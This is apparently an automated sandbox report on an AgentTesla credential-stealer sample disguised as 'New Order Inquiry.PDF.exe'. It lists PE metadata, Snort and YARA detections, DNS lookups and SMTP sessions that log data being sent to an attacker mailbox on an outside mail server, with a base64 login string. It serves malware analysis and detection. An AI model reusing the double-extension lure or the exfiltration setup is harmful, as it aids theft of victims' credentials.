                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa6ed40x57.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x800.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000xa4f340xa5000False0.703693181818data7.00471391573IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xa80000x8000x800False0.32763671875data3.42290303979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xaa0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_VERSION0xa80900x374data
                                                                RT_MANIFEST0xa84140x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightCopyright 2011
                                                                Assembly Version1.0.0.0
                                                                InternalNameContinuationTaskFromTask.exe
                                                                FileVersion1.0.0.0
                                                                CompanyName
                                                                LegalTrademarks
                                                                Comments
                                                                ProductNameLoginWindowsApp
                                                                ProductVersion1.0.0.0
                                                                FileDescriptionLoginWindowsApp
                                                                OriginalFilenameContinuationTaskFromTask.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                12/03/20-09:58:38.637407TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49743587192.168.2.3208.91.198.143
                                                                12/03/20-09:58:41.432598TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49744587192.168.2.3208.91.198.143

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 3, 2020 09:58:37.322230101 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:37.461915970 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:37.462390900 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:37.775552034 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:37.776420116 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:37.916065931 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:37.916114092 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:37.918484926 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.058747053 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.061753988 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.203701019 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.204740047 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.345262051 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.346117020 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.493155003 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.493746996 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.633471966 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.637407064 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.637665033 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.638276100 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.638465881 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:38.777288914 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.777864933 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.832415104 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:38.873779058 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.145986080 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.285917997 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.285938025 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.286468983 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.287077904 CET49743587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.289532900 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.426557064 CET58749743208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.428800106 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.428898096 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.571547985 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.571976900 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.711266994 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.711296082 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.712019920 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.851943970 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.852921009 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:40.994543076 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:40.995024920 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.135726929 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.136359930 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.289124966 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.289815903 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.429452896 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.432312012 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.432598114 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.432821989 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.433048964 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.433401108 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.433559895 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.433722973 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.433903933 CET49744587192.168.2.3208.91.198.143
                                                                Dec 3, 2020 09:58:41.571940899 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.572151899 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.572629929 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.572997093 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.612982035 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.626679897 CET58749744208.91.198.143192.168.2.3
                                                                Dec 3, 2020 09:58:41.671094894 CET49744587192.168.2.3208.91.198.143

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 3, 2020 09:56:48.413141966 CET6511053192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:48.440310001 CET53651108.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:49.669513941 CET5836153192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:49.697546005 CET53583618.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:51.843302011 CET6349253192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:51.881151915 CET53634928.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:53.498092890 CET6083153192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:53.533838987 CET53608318.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:54.551094055 CET6010053192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:54.586663961 CET53601008.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:55.626498938 CET5319553192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:55.653539896 CET53531958.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:56.557205915 CET5014153192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:56.584311962 CET53501418.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:57.588658094 CET5302353192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:57.615704060 CET53530238.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:58.660268068 CET4956353192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:58.687514067 CET53495638.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:56:59.742705107 CET5135253192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:56:59.769891977 CET53513528.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:00.550704956 CET5934953192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:00.577928066 CET53593498.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:02.920561075 CET5708453192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:02.947576046 CET53570848.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:04.738662004 CET5882353192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:04.765906096 CET53588238.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:08.357239008 CET5756853192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:08.384326935 CET53575688.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:10.999969006 CET5054053192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:11.027070045 CET53505408.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:11.334321976 CET5436653192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:11.361403942 CET53543668.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:31.371471882 CET5303453192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:31.417356968 CET53530348.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:32.592148066 CET5776253192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:32.629029989 CET53577628.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:46.007513046 CET5543553192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:46.034692049 CET53554358.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:57:50.918421030 CET5071353192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:57:50.955744982 CET53507138.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:58:22.869045019 CET5613253192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:58:22.895895958 CET53561328.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:58:24.926687002 CET5898753192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:58:24.962284088 CET53589878.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:58:36.954673052 CET5657953192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:58:37.120395899 CET53565798.8.8.8192.168.2.3
                                                                Dec 3, 2020 09:58:37.145148039 CET6063353192.168.2.38.8.8.8
                                                                Dec 3, 2020 09:58:37.182770014 CET53606338.8.8.8192.168.2.3

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Dec 3, 2020 09:58:36.954673052 CET192.168.2.38.8.8.80x70bbStandard query (0)smtp.divasvalves.comA (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.145148039 CET192.168.2.38.8.8.80x9d6eStandard query (0)smtp.divasvalves.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Dec 3, 2020 09:58:37.120395899 CET8.8.8.8192.168.2.30x70bbNo error (0)smtp.divasvalves.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.120395899 CET8.8.8.8192.168.2.30x70bbNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.120395899 CET8.8.8.8192.168.2.30x70bbNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.120395899 CET8.8.8.8192.168.2.30x70bbNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.120395899 CET8.8.8.8192.168.2.30x70bbNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.182770014 CET8.8.8.8192.168.2.30x9d6eNo error (0)smtp.divasvalves.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.182770014 CET8.8.8.8192.168.2.30x9d6eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.182770014 CET8.8.8.8192.168.2.30x9d6eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.182770014 CET8.8.8.8192.168.2.30x9d6eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                Dec 3, 2020 09:58:37.182770014 CET8.8.8.8192.168.2.30x9d6eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                                                SMTP Packets

                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                Dec 3, 2020 09:58:37.775552034 CET58749743208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                Dec 3, 2020 09:58:37.776420116 CET49743587192.168.2.3208.91.198.143EHLO 818225
                                                                Dec 3, 2020 09:58:37.916114092 CET58749743208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                250-PIPELINING
                                                                250-SIZE 41648128
                                                                250-VRFY
                                                                250-ETRN
                                                                250-STARTTLS
                                                                250-AUTH PLAIN LOGIN
                                                                250-AUTH=PLAIN LOGIN
                                                                250-ENHANCEDSTATUSCODES
                                                                250-8BITMIME
                                                                250 DSN
                                                                Dec 3, 2020 09:58:37.918484926 CET49743587192.168.2.3208.91.198.143AUTH login YmlsbHlmdW5kc0BkaXZhc3ZhbHZlcy5jb20=
                                                                Dec 3, 2020 09:58:38.058747053 CET58749743208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                Dec 3, 2020 09:58:38.203701019 CET58749743208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                Dec 3, 2020 09:58:38.204740047 CET49743587192.168.2.3208.91.198.143MAIL FROM:<billyfunds@divasvalves.com>
                                                                Dec 3, 2020 09:58:38.345262051 CET58749743208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                Dec 3, 2020 09:58:38.346117020 CET49743587192.168.2.3208.91.198.143RCPT TO:<billyfunds@divasvalves.com>
                                                                Dec 3, 2020 09:58:38.493155003 CET58749743208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                Dec 3, 2020 09:58:38.493746996 CET49743587192.168.2.3208.91.198.143DATA
                                                                Dec 3, 2020 09:58:38.633471966 CET58749743208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                Dec 3, 2020 09:58:38.638465881 CET49743587192.168.2.3208.91.198.143.
                                                                Dec 3, 2020 09:58:38.832415104 CET58749743208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 67E531C2528
                                                                Dec 3, 2020 09:58:40.145986080 CET49743587192.168.2.3208.91.198.143QUIT
                                                                Dec 3, 2020 09:58:40.285917997 CET58749743208.91.198.143192.168.2.3221 2.0.0 Bye
                                                                Dec 3, 2020 09:58:40.571547985 CET58749744208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                Dec 3, 2020 09:58:40.571976900 CET49744587192.168.2.3208.91.198.143EHLO 818225
                                                                Dec 3, 2020 09:58:40.711296082 CET58749744208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                250-PIPELINING
                                                                250-SIZE 41648128
                                                                250-VRFY
                                                                250-ETRN
                                                                250-STARTTLS
                                                                250-AUTH PLAIN LOGIN
                                                                250-AUTH=PLAIN LOGIN
                                                                250-ENHANCEDSTATUSCODES
                                                                250-8BITMIME
                                                                250 DSN
                                                                Dec 3, 2020 09:58:40.712019920 CET49744587192.168.2.3208.91.198.143AUTH login YmlsbHlmdW5kc0BkaXZhc3ZhbHZlcy5jb20=
                                                                Dec 3, 2020 09:58:40.851943970 CET58749744208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                Dec 3, 2020 09:58:40.994543076 CET58749744208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                Dec 3, 2020 09:58:40.995024920 CET49744587192.168.2.3208.91.198.143MAIL FROM:<billyfunds@divasvalves.com>
                                                                Dec 3, 2020 09:58:41.135726929 CET58749744208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                Dec 3, 2020 09:58:41.136359930 CET49744587192.168.2.3208.91.198.143RCPT TO:<billyfunds@divasvalves.com>
                                                                Dec 3, 2020 09:58:41.289124966 CET58749744208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                Dec 3, 2020 09:58:41.289815903 CET49744587192.168.2.3208.91.198.143DATA
                                                                Dec 3, 2020 09:58:41.429452896 CET58749744208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                Dec 3, 2020 09:58:41.433903933 CET49744587192.168.2.3208.91.198.143.
                                                                Dec 3, 2020 09:58:41.626679897 CET58749744208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 361741C188F

                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:09:56:48
                                                                Start date:03/12/2020
                                                                Path:C:\Users\user\Desktop\New Order Inquiry.PDF.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\New Order Inquiry.PDF.exe'
                                                                Imagebase:0x70000
                                                                File size:678912 bytes
                                                                MD5 hash:A0CE94D59DC8204E8CDBCE7C4D635D32
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Start time:09:56:51
                                                                Start date:03/12/2020
                                                                Path:C:\Users\user\Desktop\New Order Inquiry.PDF.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\New Order Inquiry.PDF.exe
                                                                Imagebase:0xed0000
                                                                File size:678912 bytes
                                                                MD5 hash:A0CE94D59DC8204E8CDBCE7C4D635D32
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >